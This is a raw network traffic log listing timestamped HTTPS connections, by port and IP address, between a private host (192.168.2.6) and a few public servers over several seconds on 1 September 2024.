Sep 1, 2024 00:54:57.210464001 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.211281061 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.211297035 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.211357117 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.211369038 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.211556911 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.212269068 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.212284088 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.212346077 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.212353945 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.212388992 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.213254929 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.213270903 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.213298082 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.213309050 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.213318110 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.213346958 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.213372946 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.213376045 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.213393927 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.213478088 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.234777927 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.234802008 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:58.323026896 CEST	49775	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:58.323070049 CEST	443	49775	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:58.323132038 CEST	49775	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:58.323540926 CEST	49776	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:58.323579073 CEST	443	49776	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:58.323641062 CEST	49776	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:58.324095011 CEST	49777	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:58.324115038 CEST	443	49777	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:58.324364901 CEST	49777	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:58.324625015 CEST	49775	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:58.324640989 CEST	443	49775	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:58.324909925 CEST	49776	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:58.324923992 CEST	443	49776	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:58.325123072 CEST	49777	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:58.325139046 CEST	443	49777	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:58.513339043 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:58.513370991 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:58.513449907 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:58.513714075 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:58.513727903 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:58.957674026 CEST	443	49777	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:58.959039927 CEST	443	49776	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:58.959254026 CEST	443	49775	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:58.999500990 CEST	49777	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.014503002 CEST	49776	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.018275023 CEST	49775	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.148294926 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.198137999 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.239234924 CEST	49775	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.239278078 CEST	443	49775	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.239722967 CEST	443	49775	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.239813089 CEST	49776	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.239859104 CEST	443	49776	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.239929914 CEST	49777	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.239945889 CEST	443	49777	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.241019011 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.241044044 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.241143942 CEST	443	49777	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.241199017 CEST	49777	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.241281033 CEST	443	49776	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.241295099 CEST	443	49776	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.241338015 CEST	49776	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.241477966 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.243206024 CEST	49775	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.243290901 CEST	443	49775	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.245512962 CEST	49777	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.245580912 CEST	443	49777	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.245922089 CEST	49776	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.246041059 CEST	443	49776	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.246301889 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.246470928 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.247582912 CEST	49775	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.247637033 CEST	49777	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.247642994 CEST	443	49777	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.247793913 CEST	49776	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.247802019 CEST	443	49776	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.247884989 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.292503119 CEST	443	49775	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.292504072 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.295977116 CEST	49777	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.296200037 CEST	49776	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.343621969 CEST	443	49776	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.343753099 CEST	443	49776	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.343802929 CEST	49776	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.344556093 CEST	443	49777	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.344577074 CEST	443	49777	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.344624043 CEST	443	49777	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.344626904 CEST	49777	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.344661951 CEST	49777	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.345560074 CEST	49776	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.345571995 CEST	443	49776	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.348206997 CEST	49777	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.348216057 CEST	443	49777	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.350070953 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.350091934 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.350099087 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.350122929 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.350137949 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.350146055 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.350158930 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.350178003 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.350193024 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.350205898 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.364461899 CEST	443	49775	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.364489079 CEST	443	49775	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.364495993 CEST	443	49775	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.364523888 CEST	443	49775	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.364537954 CEST	443	49775	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.364541054 CEST	49775	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.364548922 CEST	443	49775	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.364567041 CEST	443	49775	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.364574909 CEST	49775	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.364594936 CEST	49775	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.364615917 CEST	49775	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.427860022 CEST	49782	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.427887917 CEST	443	49782	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.427947044 CEST	49782	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.428215027 CEST	49783	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.428235054 CEST	443	49783	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.428287029 CEST	49783	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.428527117 CEST	49782	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.428540945 CEST	443	49782	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.428741932 CEST	49783	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.428755045 CEST	443	49783	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.431787014 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.431807995 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.431848049 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.431854963 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.431885004 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.431895971 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.436861992 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.436882973 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.436923981 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.436929941 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.436978102 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.450016975 CEST	443	49775	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.450036049 CEST	443	49775	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.450068951 CEST	443	49775	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.450078011 CEST	49775	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.450094938 CEST	443	49775	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.450120926 CEST	49775	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.450124979 CEST	443	49775	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.450162888 CEST	49775	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.451167107 CEST	49775	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:59.451180935 CEST	443	49775	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:59.478979111 CEST	49785	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.479002953 CEST	443	49785	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.479053974 CEST	49785	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.479247093 CEST	49785	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.479259968 CEST	443	49785	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.518026114 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.518042088 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.518099070 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.518106937 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.518135071 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.518162966 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.519404888 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.519418955 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.519471884 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.519478083 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.519514084 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.520359993 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.520373106 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.520418882 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.520423889 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.520459890 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.523626089 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.523639917 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.523714066 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.523718119 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.523758888 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.604574919 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.604588032 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.605123043 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.605156898 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.605156898 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.605165005 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.605179071 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.605214119 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.605696917 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.605710030 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.605760098 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.605762959 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.605782032 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.606440067 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.606456995 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.606492996 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.606498003 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.606533051 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.606884956 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.606895924 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.606923103 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.606925964 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.606945992 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.607727051 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.607743979 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.607775927 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.607779026 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.607800007 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.610215902 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.610228062 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.610255003 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.610280991 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.610285044 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.610308886 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:59.610321999 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.610344887 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.610785961 CEST	49778	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:59.610793114 CEST	443	49778	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.059695005 CEST	443	49783	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.076231003 CEST	443	49782	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.089636087 CEST	49782	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:00.089652061 CEST	443	49782	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.089991093 CEST	49783	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:00.089998007 CEST	443	49783	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.090097904 CEST	443	49782	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.090363979 CEST	443	49783	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.090439081 CEST	49782	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:00.090516090 CEST	443	49782	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.090709925 CEST	49783	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:00.090774059 CEST	443	49783	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.090854883 CEST	49782	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:00.090903997 CEST	49783	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:00.117351055 CEST	443	49785	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.117966890 CEST	49785	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:00.117974997 CEST	443	49785	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.118963003 CEST	443	49785	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.119021893 CEST	49785	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:00.120834112 CEST	49785	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:00.120889902 CEST	443	49785	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.121030092 CEST	49785	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:00.121036053 CEST	443	49785	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.132509947 CEST	443	49783	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.132510900 CEST	443	49782	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.170697927 CEST	49785	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:00.187216997 CEST	443	49783	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.187236071 CEST	443	49783	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.187273026 CEST	443	49783	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.187302113 CEST	49783	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:00.187402964 CEST	49783	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:00.187737942 CEST	443	49782	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.187820911 CEST	443	49782	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.187994003 CEST	49782	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:00.189209938 CEST	49782	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:00.189210892 CEST	49783	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:00.189215899 CEST	443	49783	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.189215899 CEST	443	49782	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.239247084 CEST	443	49785	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.239267111 CEST	443	49785	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.239275932 CEST	443	49785	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.239305019 CEST	443	49785	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.239331961 CEST	49785	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:00.239337921 CEST	443	49785	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.239345074 CEST	443	49785	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.239619017 CEST	49785	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:00.351999044 CEST	443	49785	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.352030039 CEST	443	49785	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.352116108 CEST	49785	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:00.352138996 CEST	443	49785	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.352164984 CEST	49785	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:00.352236032 CEST	49785	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:00.352596998 CEST	443	49785	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.352684975 CEST	443	49785	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:00.352982998 CEST	49785	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:00.366272926 CEST	49785	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:00.366288900 CEST	443	49785	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:01.581845045 CEST	49790	443	192.168.2.6	34.107.199.61
Sep 1, 2024 00:55:01.581896067 CEST	443	49790	34.107.199.61	192.168.2.6
Sep 1, 2024 00:55:01.581957102 CEST	49790	443	192.168.2.6	34.107.199.61
Sep 1, 2024 00:55:01.582333088 CEST	49790	443	192.168.2.6	34.107.199.61
Sep 1, 2024 00:55:01.582345009 CEST	443	49790	34.107.199.61	192.168.2.6
Sep 1, 2024 00:55:01.601494074 CEST	49791	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:01.601525068 CEST	443	49791	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:01.601581097 CEST	49791	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:01.601955891 CEST	49791	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:01.601968050 CEST	443	49791	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:02.083111048 CEST	443	49791	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:02.089426041 CEST	49791	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:02.089456081 CEST	443	49791	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:02.090598106 CEST	443	49791	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:02.090660095 CEST	49791	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:02.091840982 CEST	49791	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:02.091906071 CEST	443	49791	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:02.092016935 CEST	49791	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:02.092030048 CEST	443	49791	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:02.145914078 CEST	49791	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:02.158943892 CEST	443	49790	34.107.199.61	192.168.2.6
Sep 1, 2024 00:55:02.160914898 CEST	49790	443	192.168.2.6	34.107.199.61
Sep 1, 2024 00:55:02.160940886 CEST	443	49790	34.107.199.61	192.168.2.6
Sep 1, 2024 00:55:02.162056923 CEST	443	49790	34.107.199.61	192.168.2.6
Sep 1, 2024 00:55:02.162122965 CEST	49790	443	192.168.2.6	34.107.199.61
Sep 1, 2024 00:55:02.168890953 CEST	49790	443	192.168.2.6	34.107.199.61
Sep 1, 2024 00:55:02.169015884 CEST	443	49790	34.107.199.61	192.168.2.6
Sep 1, 2024 00:55:02.169101954 CEST	49790	443	192.168.2.6	34.107.199.61
Sep 1, 2024 00:55:02.169114113 CEST	443	49790	34.107.199.61	192.168.2.6
Sep 1, 2024 00:55:02.215980053 CEST	49790	443	192.168.2.6	34.107.199.61
Sep 1, 2024 00:55:02.230424881 CEST	443	49791	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:02.230546951 CEST	443	49791	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:02.232618093 CEST	49791	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:02.235490084 CEST	49791	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:02.235498905 CEST	49794	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:02.235503912 CEST	443	49791	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:02.235522985 CEST	443	49794	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:02.235646963 CEST	49794	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:02.238332033 CEST	49794	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:55:02.238346100 CEST	443	49794	13.107.246.42	192.168.2.6
Sep 1, 2024 00:55:02.261312008 CEST	49795	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:02.261348963 CEST	443	49795	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:02.261423111 CEST	49795	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:02.261616945 CEST	49795	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:02.261637926 CEST	443	49795	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:02.272161961 CEST	443	49790	34.107.199.61	192.168.2.6
Sep 1, 2024 00:55:02.272260904 CEST	443	49790	34.107.199.61	192.168.2.6
Sep 1, 2024 00:55:02.277358055 CEST	49790	443	192.168.2.6	34.107.199.61
Sep 1, 2024 00:55:02.277405024 CEST	49790	443	192.168.2.6	34.107.199.61
Sep 1, 2024 00:55:02.277422905 CEST	443	49790	34.107.199.61	192.168.2.6
Sep 1, 2024 00:55:02.288378954 CEST	49796	443	192.168.2.6	34.107.199.61
Sep 1, 2024 00:55:02.288419962 CEST	443	49796	34.107.199.61	192.168.2.6
Sep 1, 2024 00:55:02.288501024 CEST	49796	443	192.168.2.6	34.107.199.61
Sep 1, 2024 00:55:02.289513111 CEST	49796	443	192.168.2.6	34.107.199.61
Sep 1, 2024 00:55:02.289529085 CEST	443	49796	34.107.199.61	192.168.2.6
Sep 1, 2024 00:55:02.719656944 CEST	443	49795	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:02.720556021 CEST	49795	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:02.720578909 CEST	443	49795	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:02.721626043 CEST	443	49795	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:02.721992970 CEST	49795	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:02.723750114 CEST	49795	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:02.723823071 CEST	443	49795	35.190.10.96	192.168.2.6
Sep 1, 2024 00:55:02.724019051 CEST	49795	443	192.168.2.6	35.190.10.96
Sep 1, 2024 00:55:02.724031925 CEST	443	49795	35.190.10.96	192.168.2.6
